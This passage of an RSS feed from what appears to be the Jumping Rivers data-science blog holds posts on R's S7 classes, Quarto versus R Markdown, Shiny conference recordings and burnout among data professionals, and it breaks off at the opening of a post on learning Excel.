&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;coco_pops &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;cereal&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Coco Pops&amp;#34;&lt;/span&gt;, year_of_launch &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1957&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;After you&amp;rsquo;ve created an S7 object, you can use &lt;code&gt;@&lt;/code&gt; to access and set properties. For example, Coco Pops were actually released in 1958, so you could update and correct the value using:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;coco_pops&lt;span style="color:#ff7b72;font-weight:bold"&gt;@&lt;/span&gt;year_of_launch &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1958&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Alternatively, using &lt;code&gt;prop(coco_pops, &amp;quot;year_of_launch&amp;quot;) = 1958&lt;/code&gt; does the same thing.&lt;/p&gt;
&lt;p&gt;One of the things I really like about S7 is that the type of the property is automatically validated. When I defined &lt;code&gt;cereal()&lt;/code&gt; earlier, I specified that &lt;code&gt;name&lt;/code&gt; must be a character. If I was to pass in a numeric value when creating a new instance, it would return an error. You can also include a &lt;code&gt;validator&lt;/code&gt; argument to &lt;code&gt;new_class()&lt;/code&gt; to provide more complex checks on inputs.&lt;/p&gt;
&lt;p&gt;It will also return an error if you try to assign a value to a property that hasn&amp;rsquo;t been defined. For example, &lt;code&gt;coco_pops@manufacturer &amp;lt;- &amp;quot;Kellogs&amp;quot;&lt;/code&gt; returns an error because &lt;code&gt;manufacturer&lt;/code&gt; isn&amp;rsquo;t in the list of properties defined in &lt;code&gt;cereal()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;If you want a property to be &lt;em&gt;dynamic&lt;/em&gt; i.e., if you want to compute the property when it&amp;rsquo;s accessed then the &lt;code&gt;new_property()&lt;/code&gt; function is worth exploring. For example, if you wanted to return the current system time every time you called &lt;code&gt;coco_pops@time&lt;/code&gt;, you could use &lt;code&gt;new_property()&lt;/code&gt; in the class definition:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cereal &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;new_class&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;cereal&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; properties &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; class_character,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; year_of_launch &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; class_numeric,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; time &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;new_property&lt;/span&gt;(getter &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(self) &lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.time&lt;/span&gt;())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To me, this already feels a lot more intuitive compared to some of the other OOP systems in R. For more information on dynamic properties, validation, generics, and methods, read the vignette on S7 basics by viewing the documentation on the &lt;a href="https://rconsortium.github.io/OOP-WG/articles/S7.html" rel="external"&gt;package website&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="whats-different-in-s7"&gt;What&amp;rsquo;s Different in S7?&lt;/h3&gt;
&lt;p&gt;Since S7 is designed to be the successor to S3 and S4, you might be wondering two things: (i) how isS7 different to S3?, and (ii) how is S7 different to S4?&lt;/p&gt;
&lt;h4 id="s7-vs-s3"&gt;S7 vs S3&lt;/h4&gt;
&lt;p&gt;The good news is that, since S7 is built on top of S3, S7 objects are S3 objects. However, there are a couple of differences between the two:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;S3 objects have a &lt;code&gt;class&lt;/code&gt; attribute. S7 objects also have an &lt;code&gt;S7_class&lt;/code&gt; attribute that contains the object that defines the class.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;S3 objects have &lt;em&gt;attributes&lt;/em&gt;. S7 objects have &lt;em&gt;properties&lt;/em&gt; (which are built on top of attributes). This means that you can still access properties using the &lt;code&gt;attr()&lt;/code&gt; function. However, when working in S7 you generally shouldn&amp;rsquo;t use attributes directly - it just means that your old code will still work.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This means that most S7 will &lt;em&gt;just work&lt;/em&gt; with S3. You can create S7 methods for S7 classes and S3 generics, and vice versa. You can also use S7 classes to extend S3 classes, and vice versa.&lt;/p&gt;
&lt;h4 id="s7-vs-s4"&gt;S7 vs S4&lt;/h4&gt;
&lt;p&gt;The aforementioned &lt;em&gt;properties&lt;/em&gt; that S7 objects have are essentially equivalent to the &lt;em&gt;slots&lt;/em&gt; that S4 objects have. The main difference between the two is that, in S7 objects, properties can be dynamic. As with S3, you can combine S7 methods with S4 generics, and vice versa. S4 classes can extend S3 classes (which extends to cover S7 classes). However, S7 classes cannot be used to extend S4 classes.&lt;/p&gt;
&lt;h3 id="should-i-switch-to-s7"&gt;Should I switch to S7?&lt;/h3&gt;
&lt;p&gt;If you&amp;rsquo;re already using S3, switching to S7 should be fairly seamless. You can keep doing everything you&amp;rsquo;re already doing, plus you get some extra functionality for free.&lt;/p&gt;
&lt;p&gt;As I mentioned above, S7 classes cannot be used to extend S4 classes so if you&amp;rsquo;re an existing user of S4 and have a large codebase built primarily in S4 that you wish to continue to extend - switching to S7 might take a little bit more work. However, if you&amp;rsquo;re unlikely to want to extend existing S4 classes, the change to S7 should also be relatively smooth. S7 also aims to fix some of the problems with the {methods} package which implements S4, including performance and complexity issues, which is perhaps another reason to give it a go.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re at the point where you think you might need a bit more control than you can achieve with S3, I&amp;rsquo;d recommend trying S7 before S4. At least from my experience, S7 felt more intuitive and easier to learn than S4.&lt;/p&gt;
&lt;p&gt;Note that since R6 is built on encapsulated objects, rather than generic functions like S3 and S4, it&amp;rsquo;s a very different type of Object Oriented system from S7. So if you&amp;rsquo;re primarily an R6 (or Reference Classes) user, S7 isn&amp;rsquo;t going to be a replacement for your existing approaches.&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re excited to see the developments in S7 over the next few months, and we&amp;rsquo;ll soon be updating the material in our &lt;a href="https://www.jumpingrivers.com/training/course/oop-s3-s4-r6-classes/" rel="external"&gt;Object Oriented Programming in R&lt;/a&gt; training course to cover S7!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r7-oop-object-oriented-programming-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>I'm an R user: Quarto or R Markdown?</title><link>https://www.jumpingrivers.com/blog/quarto-rmarkdown-comparison/</link><pubDate>Thu, 08 Dec 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/quarto-rmarkdown-comparison/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/quarto-rmarkdown-comparison/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/quarto-rmarkdown-comparison/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Earlier this year, &lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt; (formerly RStudio) released &lt;a href="https://quarto.org/" rel="external"&gt;Quarto&lt;/a&gt;.
Quarto is an open-source scientific and technical publishing system that allows you to weave together narrative text and code to produce high-quality outputs including reports, presentations, websites, and more.&lt;/p&gt;
&lt;p&gt;One of the main features of Quarto is that it isn&amp;rsquo;t just built for R. It&amp;rsquo;s language-agnostic. It can render documents that contain code written in R, Python, Julia, or Observable. That makes it incredibly useful if you work in multilingual teams, or collaborate with people who write in a different programming language from you. But what if you don&amp;rsquo;t use any other programming languages? What benefits does Quarto bring to people who &lt;em&gt;only&lt;/em&gt; use R?&lt;/p&gt;
&lt;p&gt;In this blog post, we&amp;rsquo;ll highlight some of the features of Quarto that R users might benefit from.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-quarto-rmarkdown-comparison"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="command-line-interface"&gt;Command Line Interface&lt;/h3&gt;
&lt;p&gt;Unlike R Markdown, Quarto isn&amp;rsquo;t an R package.* Quarto is a command line interface. This makes it much easier to work with Quarto documents outside of the RStudio IDE. For example, if you ever need to render a file from a terminal, we think you&amp;rsquo;ll agree that &lt;code&gt;quarto render document.qmd&lt;/code&gt; is a lot more user-friendly than:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Rscript -e &lt;span style="color:#a5d6ff"&gt;&amp;#34;rmarkdown::render(&amp;#39;document.Rmd&amp;#39;)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To see the other command line options, run &lt;code&gt;quarto --help&lt;/code&gt; in the terminal.&lt;/p&gt;
&lt;p&gt;* Although Quarto itself isn&amp;rsquo;t an R package, there is a package called {quarto} that provides an R interface to frequently used operations in the command line interface. Installing the R {quarto} R package, doesn&amp;rsquo;t
install quarto itself - {quarto} is just a thin wrapper to actual application.&lt;/p&gt;
&lt;h3 id="quarto-is-a-single-product"&gt;Quarto is a single product&lt;/h3&gt;
&lt;p&gt;In R Markdown, you might use {distill} to build a website, {bookdown} to write a book, and {revealjs} to make slides. That might mean you&amp;rsquo;re using three different packages to create three different types of content on the same topic. Quarto combines the functionality of R Markdown, bookdown, distill, and other packages into a single system. This can make it easier to create content with multiple outputs formats. For example, you can use cross-references without installing {bookdown}, and make presentations without installing {revealjs}. Having fewer dependencies makes projects easier to maintain in the longer term - you don&amp;rsquo;t have as many R packages to update!&lt;/p&gt;
&lt;h3 id="combining-content-and-shortcodes"&gt;Combining content (and shortcodes)&lt;/h3&gt;
&lt;p&gt;Quarto allows you to use Hugo style &lt;a href="https://quarto.org/docs/authoring/includes.html#overview" rel="external"&gt;includes&lt;/a&gt;.
This gives a convenient way of reusing content across multiple documents. For example, suppose you have a paragraph or two that provides an introduction to your company. Instead of constantly copying and pasting, the paragraph is stored in a separate document, &lt;code&gt;about.qmd&lt;/code&gt;, and can be included using &lt;code&gt;{{&amp;lt; include about.qmd &amp;gt;}}&lt;/code&gt;. Adding this snippet to your document is the equivalent to copying and pasting the text from &lt;code&gt;about.qmd&lt;/code&gt; into the main file. The consequence is that relative links/images are resolved based on the directory of the main document.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;include&lt;/code&gt; is just one example of a quarto &lt;a href="https://quarto.org/docs/authoring/includes.html#overview" rel="external"&gt;shortcode&lt;/a&gt;. Other useful shortcodes to note, is the &lt;code&gt;var&lt;/code&gt; and &lt;code&gt;pagebreak&lt;/code&gt;. The &lt;code&gt;var&lt;/code&gt; shortcode, allows you to access values from the &lt;code&gt;_variables.yml&lt;/code&gt; file.
In the past, you might have written a short R function for this task. The &lt;code&gt;pagebreak&lt;/code&gt; shortcode gives a convenient mechanism for adding page breaks in different output formats, e.g. HTML, pdf, or doc.&lt;/p&gt;
&lt;p&gt;You can write your own shortcode and distribute it as an &lt;a href="https://quarto.org/docs/extensions/shortcodes.html#quick-start" rel="external"&gt;extension&lt;/a&gt;. This looks interesting, but so far, relatively few extensions have been created. One reason is that you need to learn Lua to write one.&lt;/p&gt;
&lt;h3 id="extensions"&gt;Extensions&lt;/h3&gt;
&lt;p&gt;Speaking of Quarto extensions&amp;hellip; Shortcodes are just one element that can be shared as a Quarto extension. You can also create custom templates for different types of documents. For example, adding corporate branding to a PDF report. Previously, you may have stored these templates as part of an R package. Although you can still share custom Quarto templates as part of R package, sharing it as a Quarto extension instead means you don&amp;rsquo;t have to build an R package just to share a template. It also not only means that non-R users can use your template - it means you don&amp;rsquo;t need to use R if you&amp;rsquo;re making a presentation that doesn&amp;rsquo;t include any R code.&lt;/p&gt;
&lt;p&gt;There are a number of templates shared publicly including &lt;a href="https://quarto.org/docs/extensions/listing-journals.html" rel="external"&gt;templates for academic journal formatting&lt;/a&gt;. If you need to change the layout of an article to re-submit it to a different journal, it&amp;rsquo;s as simple changing &lt;code&gt;jss-pdf&lt;/code&gt; to &lt;code&gt;jasa-pdf&lt;/code&gt;. The &lt;a href="https://github.com/mcanouil/awesome-quarto#templates" rel="external"&gt;Awesome Quarto&lt;/a&gt; GitHub repository has a list of extensions and templates created by the Quarto community.&lt;/p&gt;
&lt;h3 id="quarto-projects"&gt;Quarto Projects&lt;/h3&gt;
&lt;p&gt;Quarto projects are directories that provide a way to render all (or some) of the files in a directory at the same time. For example, chapters in a book or pages in a website. A huge benefit of Quarto projects, is the existence of the &lt;code&gt;_quarto.yml&lt;/code&gt; file. This file gives you the ability to share YAML metadata options across multiple documents - including format-specific options. You can store metadata that differs depending on whether you render a document as HTML or PDF, in a single place.&lt;/p&gt;
&lt;p&gt;Another file that can be shared across files in your project directory is the &lt;code&gt;_variables.yml&lt;/code&gt; file. This allows you to insert content from the _variables.yml file into using the &lt;code&gt;var&lt;/code&gt; shortcode. For example, you may include information on your company&amp;rsquo;s email address on different pages of your website.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;email&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;info&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;hello@jumpingrivers.com&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can then access this and add it to a page using &lt;code&gt;{{&amp;lt; var email.info &amp;gt;}}&lt;/code&gt;. If your email address changes, you don&amp;rsquo;t need to update it on every page on the website - you just need to update the &lt;code&gt;_variables.yml&lt;/code&gt; file. This feels like a really nice way of sharing information across multiple documents.&lt;/p&gt;
&lt;h3 id="global-code-block-options"&gt;Global code block options&lt;/h3&gt;
&lt;p&gt;When you want to set code chunk options in R Markdown that apply to your whole document, you need to include a set up code chunk at the top of your document.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;```{r}
knitr::opts_chunk$set(echo = FALSE)
```
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;In Quarto, rather than a writing a separate set up code chunk, you specify your document-wide options in the YAML at the start of the document. When you combine this with the YAML auto-completion feature, it makes it a lot easier to set document-wide options.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;---
title: &amp;#34;A very cool title&amp;#34;
format: html
execute:
echo: false
---
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;One of the execution options we really like is &lt;code&gt;freeze&lt;/code&gt;. Setting &lt;code&gt;freeze: true&lt;/code&gt; denotes that a document should never be re-rendered during a global project render, and setting &lt;code&gt;freeze: auto&lt;/code&gt; only re-renders a document when its source file has changed. This is really useful if, for example, you write blog posts - you don&amp;rsquo;t necessarily want to re-run and update old blog posts every time you update your website. You can freeze them instead.&lt;/p&gt;
&lt;p&gt;The other code block option we appreciate is the new &lt;code&gt;fenced&lt;/code&gt; option for &lt;code&gt;echo&lt;/code&gt;. The &lt;code&gt;echo&lt;/code&gt; argument determines whether or not the code is shown in your output. When you set &lt;code&gt;echo: fenced&lt;/code&gt; it shows the code block options as well as the code. It&amp;rsquo;s not something we use every day - but it&amp;rsquo;s very useful when you&amp;rsquo;re teaching someone else how to use Quarto!&lt;/p&gt;
&lt;p&gt;It&amp;rsquo;s important to remember that R Markdown will continue to be maintained and supported so you don&amp;rsquo;t &lt;em&gt;have&lt;/em&gt; to switch to Quarto. However, if you&amp;rsquo;re an R user considering changing over from R Markdown to Quarto, hopefully this blog post has highlighted some of the features you&amp;rsquo;ll gain from doing so.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/quarto-rmarkdown-comparison/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production: Recordings</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-recordings/</link><pubDate>Tue, 06 Dec 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-recordings/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-recordings/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-recordings/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This week, we&amp;rsquo;ve been reminding ourselves of some of the amazing talks from the Shiny in Production conference in October. The recordings are now up on our &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKJ6Un06aThcKJC7eQMSgKRD" rel="external"&gt;YouTube channel&lt;/a&gt;, for anyone to view!&lt;/p&gt;
&lt;p&gt;For a run down of the day and what you can expect from the videos, take a look at our recent &lt;a href="https://www.jumpingrivers.com/blog/shiny-in-production-highlights/" rel="external"&gt;Highlights blog&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-shiny-in-production-recordings"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;p&gt;There was even more excitement to be had at the conference, including a joint talk from &lt;a href="https://twitter.com/nic_crane" rel="external"&gt;Nic Crane&lt;/a&gt; and &lt;a href="https://twitter.com/sellorm" rel="external"&gt;Mark Sellors&lt;/a&gt;, and workshops on RStudio (now Posit) Connect, Tableau, and Reporting with Quarto!&lt;/p&gt;
&lt;p&gt;If the recordings really catch your eye, and you want to be there in person next year and get access to everything live, head over to our &lt;a href="https://www.eventbrite.co.uk/e/jumping-rivers-conference-2023-registration-429684055577" rel="external"&gt;Eventbrite page&lt;/a&gt; - Super Early Bird tickets are available now!&lt;/p&gt;
&lt;h3 id="the-playlist"&gt;The playlist&lt;/h3&gt;
&lt;br&gt;
&lt;iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/videoseries?list=PLbARZQfpqIKJ6Un06aThcKJC7eQMSgKRD" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen&gt;&lt;/iframe&gt;
&lt;img src="robot_shiny.png" alt="JR Robot holding a spanner" style="width: 300px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-recordings/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Burnout in Data Professionals - A Personal Take</title><link>https://www.jumpingrivers.com/blog/burnout-in-data-professionals/</link><pubDate>Thu, 01 Dec 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/burnout-in-data-professionals/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/burnout-in-data-professionals/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/burnout-in-data-professionals/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Data science and data engineering are incredibly cognitively demanding professions. As data professionals, we are required to leverage both our analytical/engineering skills and our interpersonal skills to be effective contributors within our organisations. Based on my personal experience, the field seems to concentrate humans who are detail-oriented, curious, impact-driven and tenacious to a fault. This A-type personality profile, while magical when applied to technical work, could reasonably also count as an occupational hazard.&lt;/p&gt;
&lt;p&gt;We also have a &lt;a href="https://www2.deloitte.com/us/en/insights/industry/technology/data-analytics-skills-shortage.html" rel="external"&gt;skills shortage&lt;/a&gt; in our field, so many data professionals are taking on more than what is reasonable for one human to endure. It is therefore no surprise that the &lt;a href="https://hbr.org/2012/10/data-scientist-the-sexiest-job-of-the-21st-century" rel="external"&gt;sexiest profession of the 21st century&lt;/a&gt; is also one of the professions with the &lt;a href="https://www.datanami.com/2021/11/02/battle-for-data-pros-heats-up-as-burnout-builds/" rel="external"&gt;highest rates of burnout&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The thing is - this field is great to work in. Extracting a clear narrative from data is one of the most satisfying things ever (I might be biassed). The minds that give us these valuable insights are the same minds that need careful tending to. Anti-burnout strategies are not only about ensuring productivity in the workplace - they are fundamental to the improved quality of life we should be striving for as a society.&lt;/p&gt;
&lt;p&gt;I think of those in our field as not unlike high-performance athletes. Boxers wear boxing gloves. Hockey players wear shin guards. Ballet dancers warm up for hours before performances. How are we proactively protecting the minds of our data professionals?&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-burnout-in-data-professionals"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="could-you-be-burnt-out"&gt;Could you be burnt out?&lt;/h3&gt;
&lt;p&gt;Before we go on to discuss strategies for dealing with burnout, it’s important to consider whether you are experiencing some of the symptoms.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://www.nhs.uk/every-mind-matters/mental-health-issues/stress/" rel="external"&gt;NHS&lt;/a&gt; describes those who are burnt out as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;feeling overwhelmed&lt;/li&gt;
&lt;li&gt;experiencing racing thoughts or difficulty concentrating&lt;/li&gt;
&lt;li&gt;irritable&lt;/li&gt;
&lt;li&gt;feeling constantly worried, anxious or scared&lt;/li&gt;
&lt;li&gt;feeling a lack of self-confidence&lt;/li&gt;
&lt;li&gt;having trouble sleeping or feeling tired all the time&lt;/li&gt;
&lt;li&gt;avoiding things or people you are having problems with&lt;/li&gt;
&lt;li&gt;eating more or less than usual&lt;/li&gt;
&lt;li&gt;drinking or smoking more than usual&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;On a personal note, I have experienced many of these symptoms during my PhD and beyond. I had this overwhelming feeling that my to-do list was simultaneously too long and also not really worth doing at all. I felt disconnected from myself and everyone in my life. Therapy was the only thing that enabled me to get a handle on my life and career path. If you are experiencing most of these symptoms on a daily basis, I highly recommend starting a journey with a trained therapist. Dealing with burnout wasn’t a pleasant experience. I’m grateful that I had the support of my therapist, family and friends. If you are experiencing this, know that you deserve the care and attention. I encourage you to make the calls you need to make.&lt;/p&gt;
&lt;h3 id="here-are-some-strategies-i-employ-to-prevent-burnout"&gt;Here are some strategies I employ to prevent burnout:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;I remind myself that I deserve care, especially from myself. This is the most tough nut to crack, but half the battle won. A good tip my coach gave me was to write two positive affirmations for myself for every self-deprecating comment I made about myself. This was really weird at first, but eventually I started writing affirmations to myself like “I deserve rest” and “I am capable”. Pretty soon into this journey, I started to believe them.&lt;/li&gt;
&lt;li&gt;I tune into my body. When I notice that my sleep is disrupted, or I’m more snacky and snoozy than usual, a little red flag is raised in my mind. When my nervous system is feeling overwhelmed, I become aware that I need some self-care intervention. Something that really helps me is time in nature, a phone call with an old friend, a hot bath or an episode of RuPaul’s Drag Race.&lt;/li&gt;
&lt;li&gt;I practice saying no. As a curious and tenacious human, I want to say yes to all of the cool projects and challenges that come my way, even if I have objectively no business taking them on. Just because you can do something doesn’t mean you necessarily should be the person to do it. If you struggle to say “no” to your boss directly, try saying something like “let me have a look at what I can shuffle around on my plate to make space for this task”. This way you have time to strategise fitting the work into your schedule, while reminding your manager that your plate is already at capacity.&lt;/li&gt;
&lt;li&gt;I try my best to communicate my needs to the people who are affected by my actions. Managing expectations reduces my stress and the stress of those around me.&lt;/li&gt;
&lt;li&gt;I make time for things that bring me pure unadulterated joy. Reconnect with parts of yourself that you left in childhood, like reading an old favourite book or watching the Lion King. Refilling your cup is so important. It isn’t enough to rest, it’s also important to recharge.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In recovering from burnout, it was very important to me to be intentional about the next workplace I would invest my time and energy in. Eight months in, I am really enjoying the level of care that I am seeing within Jumping Rivers. There is a very strong culture of colleagues trying to make sure that their peers don’t overwork themselves. People here are very eager to help one another out where they can. We have a generous amount of leave and flexible working hours. It&amp;rsquo;s not uncommon to look at calendars and see &amp;ldquo;MOT&amp;rdquo;, &amp;ldquo;School run&amp;rdquo;, &amp;ldquo;Going for a paddle&amp;rdquo;. With this visibility, we remind one another that we work to live and don’t live to work. There is also trust from upper management that we are all trying our very best, and don’t need micromanaging. The value of this trust cannot be overstated.&lt;/p&gt;
&lt;p&gt;I’ll finish by saying that no person is perfect.This human-level imperfection scales to organisation-level imperfection. No group of humans is going to perfectly navigate the challenges presented by modern life. What’s important to me is to try my best to bring patience, sensitivity and empathy to all areas, including the workplace. To my colleagues and employers, of course, but most importantly to myself.&lt;/p&gt;
&lt;p&gt;If you are practising self-care for a few weeks and are still feeling overwhelmed, it might be time to go and see a mental health care professional. Unfortunately one cannot eat-pray-love oneself out of all issues.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/burnout-in-data-professionals/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Learning Excel as an R user</title><link>https://www.jumpingrivers.com/blog/learning-excel-after-r/</link><pubDate>Thu, 24 Nov 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/learning-excel-after-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/learning-excel-after-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/learning-excel-after-r/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Recently I came across a situation where I had to use Microsoft Excel for a project. As somebody who has always used R for any statistical analysis, I may not have been entirely enthusiastic about the idea of leaving R behind for the world of Excel. But I figured it would be a good time to dip my toes in. In this blog post I discuss some of the things I found surprisingly difficult when learning Excel as an R user.&lt;/p&gt;
&lt;h2 id="getting-used-to-the-lack-of-resources"&gt;Getting used to the lack of resources&lt;/h2&gt;
